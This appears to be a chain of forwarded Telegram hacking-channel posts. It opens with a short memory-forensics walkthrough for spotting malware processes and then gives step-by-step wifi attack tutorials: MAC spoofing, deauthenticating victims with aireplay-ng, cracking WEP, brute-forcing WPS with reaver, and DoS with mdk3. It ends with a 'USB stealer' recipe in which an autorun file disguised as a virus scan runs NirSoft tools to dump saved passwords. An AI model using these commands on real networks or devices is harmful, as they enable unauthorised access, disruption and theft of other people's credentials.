Backup
Forwarded from Groot
Forwarded from Team ETF (Groot)
4. So let's use the pstree plugin, which will show the running processes in tree format.

And here we can see 2 suspicious processes (guessing, as they might be malware):

Vmware-tray
Rick and monty

Because the PID of Rick and monty matches the PPID of vmware-tray.

PID - process ID
PPID - parent PID

vmware-tray is a common process in VMware. The name doesn't look suspicious.
Let's check where the file exists.
Forwarded from Groot
Forwarded from Team ETF (Groot)
5. Let's use the filescan module to check where the actual file exists.

Now we can see that the file isn't in the VMware directory at all. It's in the most common malware directory, "tmp".

Now we are sure that it is a virus.
To make 100% sure, dump that file to your device and scan it on VirusTotal (use the dumpmem plugin or any suitable plugin to dump it).
Forwarded from Groot
Forwarded from Team ETF (Groot)
6. You can also analyse the 2nd suspicious process we found, the Rick and Morty file. Let's do that quickly, the same as the above process.
Forwarded from Groot
Forwarded from Team ETF (Groot)
Watch this carefully,
That stupid Rick downloaded this file via torrent 😂.
This also contains malware,
Dump this one too and check it on VirusTotal.

It's time to sleep, see you guys at next time.
Forwarded from Team ETF (ᴵ ᵃᵐ ᵍʳᵒᵒᵗ)
Shall I make this channel private?
All content posted here is unique compared to any other channel on Telegram.
Anonymous Quiz: Yes 67% / No 33%
Forwarded from Team ETF (ᴵ ᵃᵐ ᵍʳᵒᵒᵗ)
Have a look at our "Team ETF" Channel reviews,
@Team_Etf_reviews

For any queries or doubts, contact
@Etf_Zan_bot ( fast reply )
@Zincster ( slow 😐 )
Forwarded from Team ETF (ᴵ ᵃᵐ ᵍʳᵒᵒᵗ)
Hello guys....
🛑 I will be busy for some 10 days 🛑

So, I am sharing my old wifi hacking posts.
I will continue forensics when I get free.
Till then, refer to these posts.
Forwarded from Zincster
Part-01 :-
Wifi cracking :-

Requirements:-
1. Wifi adapter supporting monitor mode (monitor mode is used to capture packets. Well, a normal wifi adapter will be in managed mode, in which we usually connect to other devices.)
2. Any OS (but I recommend Kali Linux)

Demonstration:-

To be safe, change your adapter's MAC address
🧬ifconfig wlan0 down
🧬ifconfig wlan0 hw ether 11:22:33:44:55:66
🧬ifconfig wlan0 up

This method is the same for changing the MAC address of any interface (like wlan0, eth0, etc.).
If you want to change the MAC address of eth0, just replace wlan0 with eth0.
Here, first we stopped the interface.
hw -> hardware
And we gave the desired MAC address (you can give any 12 digits in the same format).
And in the next step we started the interface.

Monitor mode:-

As I told earlier, every adapter will be in managed mode, so you need to change that mode to monitor mode.
To do this we use airmon-ng.

🧬airmon-ng check kill
🧬airmon-ng start wlan0

Now if you run ifconfig, the wlan0 interface will have been renamed to mon0 or wlan0mon or some other name.

Written by :- I am groot [ @Etf_Zan ]
Forwarded from Zincster
Part-02 :-
Deauthentication :-
We use this trick to disconnect any user from the network.

First run
🧬airodump-ng wlan0mon

Now you can see the router's MAC (BSSID) and its channel.
Now, to get all users on that wifi, run:

🧬airodump-ng --channel [_] --bssid [_] wlan0mon

Now you can see all the users on that wifi.
Now use aireplay-ng to disconnect them:

🧬aireplay-ng --deauth 555555 -a [_] -c [_] wlan0mon

Here,
555555 is the number of packets we are sending to the particular victim to disconnect them from the router.

-a is the router's BSSID
-c is the victim's MAC, which we got by running airodump-ng.

In case you want to disconnect all clients from the router, then:

🧬aireplay-ng --deauth 55555555 -a [_] wlan0mon

This will disconnect all the clients.
But the effect will be weaker, meaning it may take some time to disconnect every client.

Written by :- I am groot [ @Etf_Zan ]
Forwarded from Zincster
Part-03:-
WEP cracking :-
🧬airodump-ng wlan0mon

As we already know, we now get all the routers available.

🧬airodump-ng --bssid [_] --channel [_] --write trial

All the steps are the same as I told earlier; the one change here is that we are writing the captured packets to the trial file.

🧬aireplay-ng --fakeauth 0 -a [_] -h [_] wlan0mon

Here,
We are doing fake authentication.
0 means authentication only once.
-a -> victim's BSSID
-h -> your BSSID

🧬aireplay-ng --arpreply -b [_] -h [_] wlan0mon

After successfully authenticating with the target, we will wait to get the ARP packet, and we will inject that packet into the traffic.
You can see we didn't specify any number after --arpreply as we did earlier with --fakeauth. This is because we want the process to repeat continuously till we get enough IVs.

-b -> victim's BSSID
-h -> your BSSID
IV -> random initialization vector used to generate key streams

I forgot to tell you earlier that WEP uses the RC4 algorithm (24 bits) to encrypt the flow of data.

IV + key(password) = key_stream

Now key_stream will be added to the data to make it unreadable.

Now, we have the capture file which we got in the first step (trial).
The file will be created as trial-01.cap.
Now, crack it:

🧬aircrack-ng trial-01.cap

That's it, you will get the key after it has been cracked.
Remember, the fake authentication method is used for WEP only.

Written by :- I am groot [ @Etf_Zan ]
Forwarded from Zincster
Part-04 :-
WPA / WPA2 cracking
( WPS enabled )

WPA -> TKIP encryption
WPA2 -> CCMP encryption

Remember the encryption used in WEP -> RC4 algorithm

To see all the WPS enabled routers, we use the wash tool:

🧬wash -i wlan0mon

-i -> interface

🧬aireplay-ng --fakeauth 100 -a [_] -h [_]

-a -> victim's MAC
-h -> your MAC

You may wonder why we have used 50 here; that's because we need to associate with the target network every 50 seconds.

Now, to bruteforce we use a tool called reaver:

🧬reaver --bssid [_] --channel [_] -i wlan0mon -A -N -vvv

-A -> we are telling it not to associate with the target.

-N -> we are telling it to use no NACKs when authenticating.

-vvv -> this is called the verbose level; if you have used nmap you will be well aware of this.

If some router blocks you (meaning, like on some website logins, if you enter wrong passwords it will block you), then for this we will use a tool called mdk3, which will use a different MAC address while connecting (like we use different VPNs to change our IP).

🧬mdk3 wlan0mon a -a [_]

a -> it is a test mode, which is DoS mode here

-a -> victim's MAC

That's it.....

Written by :- I am groot [ @Etf_Zan ]
Forwarded from Team ETF (ᴵ ᵃᵐ ᵍʳᵒᵒᵗ)
Forwarded from Team ETF (Groot 【★𝘽𝙂★】)
Some people learn from us; when we ask them for help, they ignore us or say it's paid 🙂.

We will go private today or tomorrow; only a few people from here will be selected for the private group.
Forwarded from Team ETF (Groot 【★𝘽𝙂★】)
IB @Etf_Zan_bot
With your tags.

If you really like our channel and want to learn more.
Forwarded from Team ETF (Groot 【★𝘽𝙂★】)
Kindly add your USERTAGS (username) in the msg.
Only a few will be selected.
Forwarded from BLACK HAT KINGDOM
🔰HOW TO MAKE A USB STEALER🔰

◼️TUTORIAL:

open notepad/wordpad
type:
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save this as AUTORUN.inf

open a new notepad/wordpad document
type:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start PasswordFox.exe /stext passwordfox.txt
start OperaPassView.exe /stext OperaPassView.txt
start ChromePass.exe /stext ChromePass.txt
start Dialupass.exe /stext Dialupass.txt
start netpass.exe /stext netpass.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
start BulletsPassView.exe /stext BulletsPassView.txt
start VNCPassView.exe /stext VNCPassView.txt
start OpenedFilesView.exe /stext OpenedFilesView.txt
start ProduKey.exe /stext ProduKey.txt
start USBDeview.exe /stext USBDeview.txt
save this as LAUNCH.bat

copy the autorun and launch file to your USB

go to
http://www.nirsoft.net/ and download the programs named in step 2

extract the files you downloaded to your desktop and copy all the .exe files to your USB
remove and re-insert your USB

click on the option perform a virus scan
(this is an example, if you want it to say something else go to the autorun file and change it ;) )
go to My Computer -> USB DRIVE and open it
you will now see some text files, if you open them you will see usernames and passwords
NOTICE: this only recovers passwords that have once been saved on your computer

➖ @BLACKHAT_BEAST ➖